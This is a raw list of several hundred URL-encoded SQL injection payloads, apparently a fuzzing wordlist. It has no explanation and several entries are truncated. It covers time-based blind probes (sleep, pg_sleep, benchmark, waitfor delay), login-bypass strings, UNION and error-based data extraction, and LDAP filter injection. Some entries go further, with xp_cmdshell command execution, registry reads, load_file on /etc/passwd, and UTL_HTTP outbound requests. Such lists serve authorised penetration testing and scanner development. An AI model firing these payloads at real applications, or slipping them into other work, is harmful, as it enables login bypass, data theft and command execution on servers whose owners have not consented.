sleep%2810%29%23
1%20or%20sleep%2810%29%23
%22%20or%20sleep%2810%29%23
%27%20or%20sleep%2810%29%23
%22%20or%20sleep%2810%29%3D%22
%27%20or%20sleep%2810%29%3D%27
1%29%20or%20sleep%2810%29%23
%22%29%20or%20sleep%2810%29%3D%22
%27%29%20or%20sleep%2810%29%3D%27
1%29%29%20or%20sleep%2810%29%23
%22%29%29%20or%20sleep%2810%29%3D%22
%27%29%29%20or%20sleep%2810%29%3D%27
%3Bwaitfor%20delay%20%270%3A0%3A10%27--
%29%3Bwaitfor%20delay%20%270%3A0%3A10%27--
%27%3Bwaitfor%20delay%20%270%3A0%3A10%27--
%22%3Bwaitfor%20delay%20%270%3A0%3A10%27--
%27%29%3Bwaitfor%20delay%20%270%3A0%3A10%27--
%22%29%3Bwaitfor%20delay%20%270%3A0%3A10%27--
%29%29%3Bwaitfor%20delay%20%270%3A0%3A10%27--
%27%29%29%3Bwaitfor%20delay%20%270%3A0%3A10%27--
%22%29%29%3Bwaitfor%20delay%20%270%3A0%3A10%27--
benchmark%2810000000%2CMD5%281%29%29%23
1%20or%20benchmark%2810000000%2CMD5%281%29%29%23
%22%20or%20benchmark%2810000000%2CMD5%281%29%29%23
%27%20or%20benchmark%2810000000%2CMD5%281%29%29%23
1%29%20or%20benchmark%2810000000%2CMD5%281%29%29%23
%22%29%20or%20benchmark%2810000000%2CMD5%281%29%29%23
%27%29%20or%20benchmark%2810000000%2CMD5%281%29%29%23
1%29%29%20or%20benchmark%2810000000%2CMD5%281%29%29%23
%22%29%29%20or%20benchmark%2810000000%2CMD5%281%29%29%23
%27%29%29%20or%20benchmark%2810000000%2CMD5%281%29%29%23
pg_sleep%2810%29--
1%20or%20pg_sleep%2810%29--
%22%20or%20pg_sleep%2810%29--
%27%20or%20pg_sleep%2810%29--
1%29%20or%20pg_sleep%2810%29--
%22%29%20or%20pg_sleep%2810%29--
%27%29%20or%20pg_sleep%2810%29--
1%29%29%20or%20pg_sleep%2810%29--
%22%29%29%20or%20pg_sleep%2810%29--
%27%29%29%20or%20pg_sleep%2810%29--
%29%2520or%2520%28%27x%27%3D%27x
%2520or%25201%3D1
%3B%20execute%20immediate%20%27sel%27%20%7C%7C%20%27ect%20us%27%20%7C%7C%20%27er%27
benchmark%2810000000%2CMD5%281%29%29%23
update
%22%3Bwaitfor%20delay%20%270%3A0%3A10%27--
1%29%20or%20pg_sleep%2810%29--
%7C%7C%28elt%28-3%2B5%2Cbin%2815%29%2Cord%2810%29%2Chex%28char%2845%29%29%29%29
%22hi%22%22%29%20or%20%28%22%22a%22%22%3D%22%22a%22
delete
like
%22%20or%20sleep%2810%29%23
pg_sleep%2810%29--
%2A%28%7C%28objectclass%3D%2A%29%29
declare%20%40q%20nvarchar%20%28200%29%200x730065006c00650063%20...
%20or%200%3D0%20%23
insert
1%29%20or%20sleep%2810%29%23
%29%20or%20%28%27a%27%3D%27a
%3B%20exec%20xp_regread
%2A%7C
%40var%20select%20%40var%20as%20var%20into%20temp%20end%20--
1%29%29%20or%20benchmark%2810000000%2CMD5%281%29%29%23
asc
%28%7C%7C6%29
%22a%22%22%20or%203%3D3--%22
%22%20or%20benchmark%2810000000%2CMD5%281%29%29%23
%20or%200%3D0%20--
1%20waitfor%20delay%20%270%3A0%3A10%27--
%20or%20%27a%27%3D%27a
hi%20or%201%3D1%20--%22
or%20a%20%3D%20a
%20UNION%20ALL%20SELECT
%29%20or%20sleep%2810%29%3D%27
%29%29%20or%20benchmark%2810000000%2CMD5%281%29%29%23
hi%27%20or%20%27a%27%3D%27a
0
21%20%25
limit
%20or%201%3D1
%20or%202%20%3E%201
%22%29%29%20or%20benchmark%2810000000%2CMD5%281%29%29%23
PRINT
hi%27%29%20or%20%28%27a%27%3D%27a
%20or%203%3D3
%29%29%3Bwaitfor%20delay%20%270%3A0%3A10%27--
a%27%20waitfor%20delay%20%270%3A0%3A10%27--
1%3B%28load_file%28char%2847%2C101%2C116%2C99%2C47%2C112%2C97%2C115%2C%20...
or%25201%3D1
1%20or%20sleep%2810%29%23
or%201%3D1
%20and%201%20in%20%28select%20var%20from%20temp%29--
%20or%20%277659%27%3D%277659
%20or%20%27text%27%20%3D%20n%27text%27
%20--
%20or%201%3D1%20or%20%27%27%3D%27
declare%20%40s%20varchar%20%28200%29%20select%20%40s%20%3D%200x73656c6%20...
exec%20xp
%3B%20exec%20master..xp_cmdshell%20%27ping%20172.10.1.255%27--
3.10E%2B17
%22%20or%20pg_sleep%2810%29--
x%27%20AND%20email%20IS%20NULL%3B%20--
%26
admin%27%20or%20%27
%20or%20%27unusual%27%20%3D%20%27unusual%27
%2F%2F
truncate
1%29%20or%20benchmark%2810000000%2CMD5%281%29%29%23
%5Cx27UNION%20SELECT
declare%20%40s%20varchar%28200%29%20select%20%40s%20%3D%200x77616974%20...
tz_offset
sqlvuln
%22%29%29%3Bwaitfor%20delay%20%270%3A0%3A10%27--
%7C%7C6
or%25201%3D1%20--
%252A%2528%257C%2528objectclass%253D%252A%2529%2529
or%20a%3Da
%29%20union%20select%20%2A%20from%20information_schema.tables%3B
PRINT%20%40%40variable
or%20isNULL%281%2F0%29%20%2F%2A
26%20%25
%22%20or%20%22a%22%3D%22a
%28sqlvuln%29
x%27%20AND%20members.email%20IS%20NULL%3B%20--
%20or%201%3D1--
%20and%201%3D%28%20if%28%28load_file%28char%28110%2C46%2C101%2C120%2C11%20...
0x770061006900740066006F0072002000640065006C00%20...
%2520%27sleep%252050%27
as
1%29%29%20or%20pg_sleep%2810%29--
%2F%2A%2A%2For%2F%2A%2A%2F1%2F%2A%2A%2F%3D%2F%2A%2A%2F1
%20union%20all%20select%20%40%40version--
%2C%40variable
%28sqlattempt2%29
%20or%20%28EXISTS%29
t%27exec%20master..xp_cmdshell%20%27nslookup%20www.googl%20...
%2520%24%28sleep%252050%29
1%20or%20benchmark%2810000000%2CMD5%281%29%29%23
%2520or%2520%27%27%3D%27
%7C%7CUTL_HTTP.REQUEST
%20or%20pg_sleep%2810%29--
hi%27%20or%20%27x%27%3D%27x%27%3B
%22%29%20or%20sleep%2810%29%3D%22
%20or%20%27whatever%27%20in%20%28%27whatever%27%29
%3B%20begin%20declare%20%40var%20varchar%288000%29%20set%20%40var%3D%27%20...
%20union%20select%201%2Cload_file%28%27%2Fetc%2Fpasswd%27%29%2C1%2C1%2C1%3B
0x77616974666F722064656C61792027303A303A313027%20...
exec%28%40s%29
%29%20or%20pg_sleep%2810%29--
%20union%20select
%20or%20sleep%2810%29%23
%20select%20%2A%20from%20information_schema.tables--
a%27%20or%201%3D1--
a%27%20or%20%27a%27%20%3D%20%27a
declare%20%40s%20varchar%2822%29%20select%20%40s%20%3D
%20or%202%20between%201%20and%203
%20or%20a%3Da--
%20or%20%271%27%3D%271
%7C
%20or%20sleep%2810%29%3D%27
%20or%201%20--%27
or%200%3D0%20%23%22
having
a%27
%22%20or%20isNULL%281%2F0%29%20%2F%2A
declare%20%40s%20varchar%20%288000%29%20select%20%40s%20%3D%200x73656c%20...
%C3%A2%C2%80%C2%98%20or%201%3D1%20--
char%254039%2541%252b%2540SELECT
order%20by
bfilename
%20having%201%3D1--
%29%20or%20benchmark%2810000000%2CMD5%281%29%29%23
%20or%20username%20like%20char%2837%29%3B
%3Bwaitfor%20delay%20%270%3A0%3A10%27--
%22%20or%201%3D1--
x%27%20AND%20userid%20IS%20NULL%3B%20--
%2A%2F%2A
%20or%20%27text%27%20%3E%20%27t%27
%20%28select%20top%201
%20or%20benchmark%2810000000%2CMD5%281%29%29%23
%22%29%3Bwaitfor%20delay%20%270%3A0%3A10%27--
a%27%20or%203%3D3--
%20--%20%26password%3D
%20group%20by%20userid%20having%201%3D1--
%20or%20%27%27%3D%27
%3B%20exec%20master..xp_cmdshell
%2520or%2520x%3Dx
select
%22%29%29%20or%20sleep%2810%29%3D%22
0x730065006c0065006300740020004000400076006500%20...
hi%27%20or%201%3D1%20--
%22%29%20or%20pg_sleep%2810%29--
%2520or%2520%27x%27%3D%27x
%20or%20%27something%27%20%3D%20%27some%27%2B%27thing%27
exec%20sp
29%20%25
%28
%C3%83%C2%BD%20or%201%3D1%20--
1%20or%20pg_sleep%2810%29--
0%20or%201%3D1
%29%20or%20%28a%3Da
uni%2F%2A%2A%2Fon%20sel%2F%2A%2A%2Fect
replace
%2527%2520or%25201%3D1
%29%29%20or%20pg_sleep%2810%29--
%257C
x%27%20AND%201%3D%28SELECT%20COUNT%28%2A%29%20FROM%20tabname%29%3B%20--
%26apos%3B%2520OR
%3B%20or%20%271%27%3D%271%27
declare%20%40q%20nvarchar%20%28200%29%20select%20%40q%20%3D%200x770061%20...
1%20or%201%3D1
%3B%20exec%20%28%27sel%27%20%2B%20%27ect%20us%27%20%2B%20%27er%27%29
23%20OR%201%3D1
%2F
anything%27%20OR%20%27x%27%3D%27x
declare%20%40q%20nvarchar%20%284000%29%20select%20%40q%20%3D
or%200%3D0%20--
desc
%7C%7C%276
%29
1%29%29%20or%20sleep%2810%29%23
or%200%3D0%20%23
%20select%20name%20from%20syscolumns%20where%20id%20%3D%20%28sele%20...
hi%20or%20a%3Da
%2A%28%7C%28mail%3D%2A%29%29
password%3A%2A%2F%3D1--
distinct
%29%3Bwaitfor%20delay%20%270%3A0%3A10%27--
to_timestamp_tz
%22%29%20or%20benchmark%2810000000%2CMD5%281%29%29%23
%20UNION%20SELECT
%252A%2528%257C%2528mail%253D%252A%2529%2529
%2Bsqlvuln
%20or%201%3D1%20%2F%2A
%29%29%20or%20sleep%2810%29%3D%27
or%201%3D1%20or%20%22%22%3D
%20or%201%20in%20%28select%20%40%40version%29--
sqlvuln%3B
%20union%20select%20%2A%20from%20users%20where%20login%20%3D%20char%20...
x%27%20or%201%3D1%20or%20%27x%27%3D%27y
28%20%25
%C3%A2%C2%80%C2%98%20or%203%3D3%20--
%40variable
%20or%20%271%27%3D%271%27--
%22a%22%22%20or%201%3D1--%22
%2F%2F%2A
%252A%257C
%22%20or%200%3D0%20--
%22%29%29%20or%20pg_sleep%2810%29--
%3F
%20or%201%2F%2A
%21
%27
%20or%20a%20%3D%20a
declare%20%40q%20nvarchar%20%28200%29%20select%20%40q%20%3D%200x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000%20exec%28%40q%29
declare%20%40s%20varchar%28200%29%20select%20%40s%20%3D%200x77616974666F722064656C61792027303A303A31302700%20exec%28%40s%29
declare%20%40q%20nvarchar%20%28200%29%200x730065006c00650063007400200040004000760065007200730069006f006e00%20exec%28%40q%29
declare%20%40s%20varchar%20%28200%29%20select%20%40s%20%3D%200x73656c65637420404076657273696f6e%20exec%28%40s%29
%27%20or%201%3D1
%18%20or%201%3D1%20--
x%27%20OR%20full_name%20LIKE%20%27%25Bob%25
%27%3B%20exec%20master..xp_cmdshell%20%27ping%20172.10.1.255%27--
%27%2520or%2520%27%27%3D%27
%27%2520or%2520%27x%27%3D%27x
%27%29%2520or%2520%28%27x%27%3D%27x
%27%20or%200%3D0%20--
%27%20or%200%3D0%20%23
%20or%200%3D0%20%23%22
%27%20or%201%3D1--
%27%20or%20%271%27%3D%271%27--
%27%20or%201%20--%27
or%201%3D1--
%27%20or%201%3D1%20or%20%27%27%3D%27
%20or%201%3D1%20or%20%22%22%3D
%27%20or%20a%3Da--
%20or%20a%3Da
%27%29%20or%20%28%27a%27%3D%27a
%27hi%27%20or%20%27x%27%3D%27x%27%3B
or
procedure
handler
%27%20or%20username%20like%20%27%25
%27%20or%20uname%20like%20%27%25
%27%20or%20userid%20like%20%27%25
%27%20or%20uid%20like%20%27%25
%27%20or%20user%20like%20%27%25
%27%3B%20exec%20master..xp_cmdshell
%27%3B%20exec%20xp_regread
t%27exec%20master..xp_cmdshell%20%27nslookup%20www.google.com%27--
--sp_password
%27%20UNION%20SELECT
%27%20UNION%20ALL%20SELECT
%27%20or%20%28EXISTS%29
%27%20%28select%20top%201
%27%7C%7CUTL_HTTP.REQUEST
1%3BSELECT%2520%2A
%3C%3E%22%27%25%3B%29%28%26%2B
%27%2520or%25201%3D1
%27sqlattempt1
%2528
%2529
%2526
%2521
%27%20or%20%27%27%3D%27
%27%20or%203%3D3
%18%20or%203%3D3%20--
%25C0%2580%2527%25C0%2580%25C0%2580%25C0%2580O%25C0%2582R%25C0%2580%25C0%25801%25C0%2580%25C0%25A11
%27-%27
%27%20%27
%27%26%27
%27%5E%27
%27%2A%27
%27%20or%20%27%27-%27
%27%20or%20%27%27%20%27
%27%20or%20%27%27%26%27
%27%20or%20%27%27%5E%27
%27%20or%20%27%27%2A%27
%22-%22
%22%20%22
%22%26%22
%22%5E%22
%22%2A%22
%22%20or%20%22%22-%22
%22%20or%20%22%22%20%22
%22%20or%20%22%22%26%22
%22%20or%20%22%22%5E%22
%22%20or%20%22%22%2A%22
or%20true--
%22%20or%20true--
%27%20or%20true--
%22%29%20or%20true--
%27%29%20or%20true--
%27%20or%20%27x%27%3D%27x
%27%29%20or%20%28%27x%27%29%3D%28%27x
%27%29%29%20or%20%28%28%27x%27%29%29%3D%28%28%27x
%22%20or%20%22x%22%3D%22x
%22%29%20or%20%28%22x%22%29%3D%28%22x
%22%29%29%20or%20%28%28%22x%22%29%29%3D%28%28%22x
or%201%3D1
or%201%3D1--%20
or%201%3D1%23
or%201%3D1%2F%2A
admin%27%20--
admin%27%20%23
admin%27%2F%2A
admin%27%20or%20%271%27%3D%271
admin%27%20or%20%271%27%3D%271%27--
admin%27%20or%20%271%27%3D%271%27%23
admin%27%20or%20%271%27%3D%271%27%2F%2A
admin%27or%201%3D1%20or%20%27%27%3D%27
admin%27%20or%201%3D1
admin%27%20or%201%3D1--
admin%27%20or%201%3D1%23
admin%27%20or%201%3D1%2F%2A
admin%27%29%20or%20%28%271%27%3D%271
admin%27%29%20or%20%28%271%27%3D%271%27--
admin%27%29%20or%20%28%271%27%3D%271%27%23
admin%27%29%20or%20%28%271%27%3D%271%27%2F%2A
admin%27%29%20or%20%271%27%3D%271
admin%27%29%20or%20%271%27%3D%271%27--
admin%27%29%20or%20%271%27%3D%271%27%23
admin%27%29%20or%20%271%27%3D%271%27%2F%2A
1234%20%27%20AND%201%3D0%20UNION%20ALL%20SELECT%20%27admin%27%2C%20%2781dc9bdb52d04dc20036dbd8313ed055
admin%22%20--
admin%22%20%23
admin%22%2F%2A
admin%22%20or%20%221%22%3D%221
admin%22%20or%20%221%22%3D%221%22--
admin%22%20or%20%221%22%3D%221%22%23
admin%22%20or%20%221%22%3D%221%22%2F%2A
admin%22or%201%3D1%20or%20%22%22%3D%22
admin%22%20or%201%3D1
admin%22%20or%201%3D1--
admin%22%20or%201%3D1%23
admin%22%20or%201%3D1%2F%2A
admin%22%29%20or%20%28%221%22%3D%221
admin%22%29%20or%20%28%221%22%3D%221%22--
admin%22%29%20or%20%28%221%22%3D%221%22%23
admin%22%29%20or%20%28%221%22%3D%221%22%2F%2A
admin%22%29%20or%20%221%22%3D%221
admin%22%29%20or%20%221%22%3D%221%22--
admin%22%29%20or%20%221%22%3D%221%22%23
admin%22%29%20or%20%221%22%3D%221%22%2F%2A
1234%20%22%20AND%201%3D0%20UNION%20ALL%20SELECT%20%22admin%22%2C%20%2281dc9bdb52d04dc20036dbd8313ed055
%27%20AND%201%3D1--
%27%20AND%201%3D0--
%27%20AND%201%3D1%23
%27%20AND%201%3D0%23
%27%20AND%201%3D1%2F%2A
%27%20AND%201%3D0%2F%2A
%27%20AND%20%28SELECT%20COUNT%28%2A%29%20FROM%20information_schema.tables%29--
%27%20AND%20%28SELECT%20table_name%20FROM%20information_schema.tables%20LIMIT%201%29--
%27%20AND%20%28SELECT%20column_name%20FROM%20information_schema.columns%20LIMIT%201%29--
%27%20AND%20EXTRACTVALUE%281%2C%20CONCAT%280x5c%2C%20VERSION%28%29%29%29--
%27%20AND%20%28SELECT%201%20FROM%20%28SELECT%20COUNT%28%2A%29%2C%20CONCAT%28VERSION%28%29%2C%20FLOOR%28RAND%28%29%2A2%29%29%20x%20FROM%20information_schema.tables%20GROUP%20BY%20x%29%20y%29--
%27%20AND%20%28SELECT%201%2F0%20FROM%20dual%29--
%27%20AND%201%3DCAST%28%28SELECT%20%40%40version%29%20AS%20INT%29--
%27%20AND%20ASCII%28SUBSTRING%28%40%40version%2C1%2C1%29%29%3D77--
%27%20AND%20%28SELECT%20name%20FROM%20sysobjects%20WHERE%20xtype%3D%27U%27%29%3D%27users%27--
%27%20AND%20%28SELECT%20LEN%28%40%40version%29%29%20%3E%200--
%27%20AND%201%3DDB_ID%28%27master%27%29--
%27%20AND%201%3D%28SELECT%20COUNT%28%2A%29%20FROM%20users%29--
%27%20AND%20%28SELECT%20COUNT%28%2A%29%20FROM%20sysobjects%29--
%27%20AND%20%28SELECT%201%20FROM%20sys.objects%20WHERE%20name%3D%27users%27%29%3D1--
%27%20AND%20%28SELECT%201%2F0%29--
%27%20AND%20CONVERT%28INT%2C%20%28SELECT%20%40%40version%29%29%3D1--
%27%20AND%201%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sys.columns%29--
%27%20AND%20EXISTS%28SELECT%20%2A%20FROM%20sysobjects%20WHERE%20name%3D%27users%27%29--
%27%20AND%20%28SELECT%20TOP%201%20name%20FROM%20sysobjects%20WHERE%20xtype%20%3D%20%27U%27%29%20%3D%20%27users%27--
%27%20AND%20%28SELECT%20COUNT%28%2A%29%20FROM%20information_schema.tables%20WHERE%20table_schema%3DDATABASE%28%29%29%20%3E%200--
%27%20AND%20LENGTH%28DATABASE%28%29%29%3E0--
%27%20AND%20%28SELECT%20name%20FROM%20sys.databases%20WHERE%20database_id%3D1%29%3D%27master%27--
%27%20AND%201%3D%28SELECT%20ISNULL%28NULL%2C%201%29%29--
%27%20AND%201%3D%28SELECT%201%2F0%29--
%27%20OR%20IF%281%3D1%2C%20SLEEP%2810%29%2C%200%29--
%27%20OR%20IF%281%3D2%2C%20SLEEP%2810%29%2C%200%29--
%27%20AND%20SLEEP%2810%29--
%27%20AND%20IF%281%3D1%2C%20BENCHMARK%281000000%2CMD5%281%29%29%2C%200%29--
%27%20AND%20IF%281%3D2%2C%20BENCHMARK%281000000%2CMD5%281%29%29%2C%200%29--
%27%20OR%20SLEEP%2810%29--
%27%20OR%20BENCHMARK%281000000%2CMD5%28%27a%27%29%29--
%27%20AND%20%28SELECT%20IF%281%3D1%2CSLEEP%2810%29%2C0%29%29--
%27%20AND%20IF%28%28SELECT%20COUNT%28%2A%29%20FROM%20users%29%3E0%2C%20SLEEP%2810%29%2C%200%29--
%27%20AND%20IF%28%28SELECT%20%27a%27%29%3D%27a%27%2C%20SLEEP%2810%29%2C%200%29--
%27%20AND%20IF%28%28SELECT%20LENGTH%28user%28%29%29%29%3E0%2C%20SLEEP%2810%29%2C%200%29--
%27%20OR%20IF%28EXISTS%28SELECT%20%2A%20FROM%20users%29%2C%20SLEEP%2810%29%2C%200%29--
%27%20AND%20IF%28SUBSTRING%28DATABASE%28%29%2C1%2C1%29%3D%27t%27%2C%20SLEEP%2810%29%2C%200%29--
%27%20AND%20IF%28%28SELECT%20version%28%29%29%20LIKE%20%275%25%27%2C%20SLEEP%2810%29%2C%200%29--
%27%20AND%20IF%281%3D1%2CSLEEP%2810%29%2C0%29--
%27%20OR%20IF%281%3D1%2CSLEEP%2810%29%2C0%29%23
%27%20OR%20SLEEP%2810%29%23
%27%20OR%20IF%281%3D1%2C%20SLEEP%2810%29%2C%20NULL%29--
%27%20AND%20IF%281%3D1%2C%20SLEEP%2810%29%2C%20NULL%29--
%27%20AND%20IF%28RAND%28%29%3C1%2C%20SLEEP%2810%29%2C%200%29--
%27%20AND%20IF%281%3D1%2C%20SLEEP%2810%29%2C%20BENCHMARK%281000000%2CMD5%281%29%29%29--
%27%20AND%20IF%28ASCII%28SUBSTRING%28DATABASE%28%29%2C1%2C1%29%29%3E64%2CSLEEP%2810%29%2C0%29--
%27%20AND%20IF%28ASCII%28SUBSTRING%28USER%28%29%2C1%2C1%29%29%3E64%2CSLEEP%2810%29%2C0%29--
%27%20AND%20IF%28%28SELECT%20COUNT%28%2A%29%20FROM%20information_schema.tables%29%3E10%2CSLEEP%2810%29%2C0%29--
%27%20AND%20IF%28%28SELECT%20COUNT%28%2A%29%20FROM%20users%29%3E10%2CSLEEP%2810%29%2C0%29--
%27%3B%20WAITFOR%20DELAY%20%270%3A0%3A10%27--
%27%3B%20IF%20%281%3D1%29%20WAITFOR%20DELAY%20%270%3A0%3A10%27--
%27%3B%20IF%20EXISTS%28SELECT%20%2A%20FROM%20sysobjects%29%20WAITFOR%20DELAY%20%270%3A0%3A10%27--
%27%3B%20IF%20%28SELECT%20COUNT%28%2A%29%20FROM%20sysobjects%29%20%3E%200%20WAITFOR%20DELAY%20%270%3A0%3A10%27--
%27%3B%20IF%20LEN%28DB_NAME%28%29%29%20%3E%200%20WAITFOR%20DELAY%20%270%3A0%3A10%27--
%27%3B%20IF%20ASCII%28SUBSTRING%28%40%40version%2C1%2C1%29%29%3D77%20WAITFOR%20DELAY%20%270%3A0%3A10%27--
%27%3B%20IF%20SYSTEM_USER%20%3D%20%27sa%27%20WAITFOR%20DELAY%20%270%3A0%3A10%27--
%27%3B%20IF%20%28SELECT%20IS_SRVROLEMEMBER%28%27sysadmin%27%29%29%20%3D%201%20WAITFOR%20DELAY%20%270%3A0%3A10%27--
%27%20AND%201%3D1%3B%20WAITFOR%20DELAY%20%270%3A0%3A10%27--
%27%20AND%20EXISTS%28SELECT%20%2A%20FROM%20sysobjects%29%20WAITFOR%20DELAY%20%270%3A0%3A10%27--
%27%3B%20SELECT%20SLEEP%2810%29--
%27%3B%20SELECT%20%2A%20FROM%20information_schema.tables--
%27%3B%20SELECT%20user%28%29--
%27%3B%20SHOW%20DATABASES--
%27%3B%20SELECT%20%40%40version--
%27%3B%20DESCRIBE%20users--
%27%3B%20SHOW%20TABLES--
%27%3B%20USE%20testdb--
%27%3B%20SET%20%40a%3D1--
%27%3B%20DO%20SLEEP%2810%29--
%27%3B%20SELECT%20COUNT%28%2A%29%20FROM%20users--
%27%3B%20SELECT%20CURRENT_USER--
%27%3B%20SELECT%20DATABASE%28%29--
%27%3B%20SELECT%20NOW%28%29--
%27%3B%20SELECT%20BENCHMARK%281000000%2CMD5%28%27test%27%29%29--
%27%3B%20OPTIMIZE%20TABLE%20users--
%27%3B%20CHECK%20TABLE%20users--
%27%3B%20EXEC%20xp_cmdshell%28%27dir%27%29--
%27%3B%20EXEC%20sp_who--
%27%3B%20EXEC%20sp_helpdb--
%27%3B%20EXEC%20sp_configure--
%27%3B%20EXEC%20sp_tables--
%27%3B%20SELECT%20name%20FROM%20master..sysdatabases--
%27%3B%20DBCC%20CHECKDB--
%27%3B%20EXEC%20sp_columns%20users--
%20AND%201%3D1--
%20AND%201%3D0--
%20AND%201%3D1%23
%20AND%201%3D0%23
%20AND%201%3D1%2F%2A
%20AND%201%3D0%2F%2A
%20AND%20%28SELECT%20COUNT%28%2A%29%20FROM%20information_schema.tables%29--
%20AND%20%28SELECT%20table_name%20FROM%20information_schema.tables%20LIMIT%201%29--
%20AND%20%28SELECT%20column_name%20FROM%20information_schema.columns%20LIMIT%201%29--
%20AND%20EXTRACTVALUE%281%2C%20CONCAT%280x5c%2C%20VERSION%28%29%29%29--
%20AND%20%28SELECT%201%20FROM%20%28SELECT%20COUNT%28%2A%29%2C%20CONCAT%28VERSION%28%29%2C%20FLOOR%28RAND%28%29%2A2%29%29%20x%20FROM%20information_schema.tables%20GROUP%20BY%20x%29%20y%29--
%20AND%20%28SELECT%201%2F0%20FROM%20dual%29--
%20AND%201%3DCAST%28%28SELECT%20%40%40version%29%20AS%20INT%29--
%20AND%20ASCII%28SUBSTRING%28%40%40version%2C1%2C1%29%29%3D77--
%20AND%20%28SELECT%20name%20FROM%20sysobjects%20WHERE%20xtype%3DU%29%3Dusers--
%20AND%20%28SELECT%20LEN%28%40%40version%29%29%20%3E%200--
%20AND%201%3DDB_ID%28master%29--
%20AND%201%3D%28SELECT%20COUNT%28%2A%29%20FROM%20users%29--
%20AND%20%28SELECT%20COUNT%28%2A%29%20FROM%20sysobjects%29--
%20AND%20%28SELECT%201%20FROM%20sys.objects%20WHERE%20name%3Dusers%29%3D1--
%20AND%20%28SELECT%201%2F0%29--
%20AND%20CONVERT%28INT%2C%20%28SELECT%20%40%40version%29%29%3D1--
%20AND%201%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sys.columns%29--
%20AND%20EXISTS%28SELECT%20%2A%20FROM%20sysobjects%20WHERE%20name%3Dusers%29--
%20AND%20%28SELECT%20TOP%201%20name%20FROM%20sysobjects%20WHERE%20xtype%20%3D%20U%29%20%3D%20users--
%20AND%20%28SELECT%20COUNT%28%2A%29%20FROM%20information_schema.tables%20WHERE%20table_schema%3DDATABASE%28%29%29%20%3E%200--
%20AND%20LENGTH%28DATABASE%28%29%29%3E0--
%20AND%20%28SELECT%20name%20FROM%20sys.databases%20WHERE%20database_id%3D1%29%3Dmaster--
%20AND%201%3D%28SELECT%20ISNULL%28NULL%2C%201%29%29--
%20AND%201%3D%28SELECT%201%2F0%29--
%20OR%20IF%281%3D1%2C%20SLEEP%2810%29%2C%200%29--
%20OR%20IF%281%3D2%2C%20SLEEP%2810%29%2C%200%29--
%20AND%20SLEEP%2810%29--
%20AND%20IF%281%3D1%2C%20BENCHMARK%281000000%2CMD5%281%29%29%2C%200%29--
%20AND%20IF%281%3D2%2C%20BENCHMARK%281000000%2CMD5%281%29%29%2C%200%29--
%20OR%20SLEEP%2810%29--
%20OR%20BENCHMARK%281000000%2CMD5%28a%29%29--
%20AND%20%28SELECT%20IF%281%3D1%2CSLEEP%2810%29%2C0%29%29--
%20AND%20IF%28%28SELECT%20COUNT%28%2A%29%20FROM%20users%29%3E0%2C%20SLEEP%2810%29%2C%200%29--
%20AND%20IF%28%28SELECT%20a%29%3Da%2C%20SLEEP%2810%29%2C%200%29--
%20AND%20IF%28%28SELECT%20LENGTH%28user%28%29%29%29%3E0%2C%20SLEEP%2810%29%2C%200%29--
%20OR%20IF%28EXISTS%28SELECT%20%2A%20FROM%20users%29%2C%20SLEEP%2810%29%2C%200%29--
%20AND%20IF%28SUBSTRING%28DATABASE%28%29%2C1%2C1%29%3Dt%2C%20SLEEP%2810%29%2C%200%29--
%20AND%20IF%28%28SELECT%20version%28%29%29%20LIKE%205%25%2C%20SLEEP%2810%29%2C%200%29--
%20AND%20IF%281%3D1%2CSLEEP%2810%29%2C0%29--
%20OR%20IF%281%3D1%2CSLEEP%2810%29%2C0%29%23
%20OR%20SLEEP%2810%29%23
%20OR%20IF%281%3D1%2C%20SLEEP%2810%29%2C%20NULL%29--
%20AND%20IF%281%3D1%2C%20SLEEP%2810%29%2C%20NULL%29--
%20AND%20IF%28RAND%28%29%3C1%2C%20SLEEP%2810%29%2C%200%29--
%20AND%20IF%281%3D1%2C%20SLEEP%2810%29%2C%20BENCHMARK%281000000%2CMD5%281%29%29%29--
%20AND%20IF%28ASCII%28SUBSTRING%28DATABASE%28%29%2C1%2C1%29%29%3E64%2CSLEEP%2810%29%2C0%29--
%20AND%20IF%28ASCII%28SUBSTRING%28USER%28%29%2C1%2C1%29%29%3E64%2CSLEEP%2810%29%2C0%29--
%20AND%20IF%28%28SELECT%20COUNT%28%2A%29%20FROM%20information_schema.tables%29%3E10%2CSLEEP%2810%29%2C0%29--
%20AND%20IF%28%28SELECT%20COUNT%28%2A%29%20FROM%20users%29%3E10%2CSLEEP%2810%29%2C0%29--
%3B%20WAITFOR%20DELAY%200%3A0%3A10--
%3B%20IF%20%281%3D1%29%20WAITFOR%20DELAY%200%3A0%3A10--
%3B%20IF%20EXISTS%28SELECT%20%2A%20FROM%20sysobjects%29%20WAITFOR%20DELAY%200%3A0%3A10--
%3B%20IF%20%28SELECT%20COUNT%28%2A%29%20FROM%20sysobjects%29%20%3E%200%20WAITFOR%20DELAY%200%3A0%3A10--
%3B%20IF%20LEN%28DB_NAME%28%29%29%20%3E%200%20WAITFOR%20DELAY%200%3A0%3A10--
%3B%20IF%20ASCII%28SUBSTRING%28%40%40version%2C1%2C1%29%29%3D77%20WAITFOR%20DELAY%200%3A0%3A10--
%3B%20IF%20SYSTEM_USER%20%3D%20sa%20WAITFOR%20DELAY%200%3A0%3A10--
%3B%20IF%20%28SELECT%20IS_SRVROLEMEMBER%28sysadmin%29%29%20%3D%201%20WAITFOR%20DELAY%200%3A0%3A10--
%20AND%201%3D1%3B%20WAITFOR%20DELAY%200%3A0%3A10--
%20AND%20EXISTS%28SELECT%20%2A%20FROM%20sysobjects%29%20WAITFOR%20DELAY%200%3A0%3A10--
%3B%20SELECT%20SLEEP%2810%29--
%3B%20SELECT%20%2A%20FROM%20information_schema.tables--
%3B%20SELECT%20user%28%29--
%3B%20SHOW%20DATABASES--
%3B%20SELECT%20%40%40version--
%3B%20DESCRIBE%20users--
%3B%20SHOW%20TABLES--
%3B%20USE%20testdb--
%3B%20SET%20%40a%3D1--
%3B%20DO%20SLEEP%2810%29--
%3B%20SELECT%20COUNT%28%2A%29%20FROM%20users--
%3B%20SELECT%20CURRENT_USER--
%3B%20SELECT%20DATABASE%28%29--
%3B%20SELECT%20NOW%28%29--
%3B%20SELECT%20BENCHMARK%281000000%2CMD5%28test%29%29--
%3B%20OPTIMIZE%20TABLE%20users--
%3B%20CHECK%20TABLE%20users--
%3B%20EXEC%20xp_cmdshell%28dir%29--
%3B%20EXEC%20sp_who--
%3B%20EXEC%20sp_helpdb--
%3B%20EXEC%20sp_configure--
%3B%20EXEC%20sp_tables--
%3B%20SELECT%20name%20FROM%20master..sysdatabases--
%3B%20DBCC%20CHECKDB--
%3B%20EXEC%20sp_columns%20users--
